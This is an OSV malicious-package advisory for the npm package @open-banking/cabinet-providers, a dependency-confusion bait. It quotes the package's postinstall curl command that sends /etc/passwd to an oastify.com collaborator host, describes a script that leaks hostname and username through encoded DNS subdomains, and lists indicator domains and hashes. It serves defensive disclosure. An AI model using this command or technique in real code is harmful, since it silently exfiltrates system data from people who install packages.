MAL-2026-5392

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@open-banking/cabinet-providers/MAL-2026-5392.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5392

Published

2026-06-09T16:05:42Z

Modified

2026-06-09T17:16:29.714551913Z

Summary

Malicious code in @open-banking/cabinet-providers (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280)

@open-banking/cabinet-providers@999.9.5 is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle. package.json declares "postinstall": "node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com", which posts the contents of /etc/passwd (prefixed by the installer's hostname as a subdomain) to a Burp Collaborator (OAST) endpoint. The bundled scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username, splits the result into 50-character chunks joined by ., and fetches http://<chunks>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com over plain HTTP — leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on npm install with no user consent.

Database specific

{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-09T16:59:44.589998734Z",
            "versions": [
                "999.9.2"
            ],
            "sha256": "1c1de2e003fc91eaf208c2c89119ca1390a5aefc53409c150e2181dd62ae8462",
            "id": "IN-MAL-2026-004960",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T16:06:01Z"
        },
        {
            "modified_time": "2026-06-09T16:05:42Z",
            "versions": [
                "999.9.5"
            ],
            "sha256": "376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280",
            "id": "IN-MAL-2026-004957",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.387454434Z"
        },
        {
            "modified_time": "2026-06-09T16:05:43Z",
            "versions": [
                "999.9.5"
            ],
            "sha256": "3eb304356656c325d4ab5185af3ffd5679fe5c9d2f7be46bc7c47d4bad94b42f",
            "id": "IN-MAL-2026-004958",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.433177866Z"
        },
        {
            "modified_time": "2026-06-09T16:06:01Z",
            "versions": [
                "999.9.2"
            ],
            "sha256": "897ab059e2133dd6c2a8a23dea4e3e39006ca89a2ed3350db82cb9ad063ce408",
            "id": "IN-MAL-2026-004959",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.489953592Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @open-banking/cabinet-providers

Package

Name: @open-banking/cabinet-providers; View open source insights on deps.dev
Purl: pkg:npm/%40open-banking%2Fcabinet-providers

Affected ranges

Affected versions

999.*

999.9.2

999.9.5

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "4feadd6cb72ff79d7268326436a7e29148ffa83da3dec74967c7094c5967f43c",
            "tlsh": "c8d09760bc00cb73b9cd05274128b281b8858c471304b82205db82d0c1247b2a8ea90a",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "domains": [
        "7363616e2d303736353937333430343563.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "2f686f6d652f7363616e.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "7363616e.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "73637265616d3367672077617320646f696e67206275672068.756e74696e67.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "31302e3230302e3134342e32.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live"
    ],
    "package_integrity": [
        {
            "filename": "cabinet-providers-999.9.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-U0fdIncWVRhWDw58c4k+tE40EkCYTba//Vl6JokjkK6ra4G+3+VfXQmm60VY/GE2C1SomLUqJ/Sp02HlAyym2w==",
                "sha1": "ee156078072fcac50fdf46060b026e3c0c250dad"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@open-banking/cabinet-providers/MAL-2026-5392.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]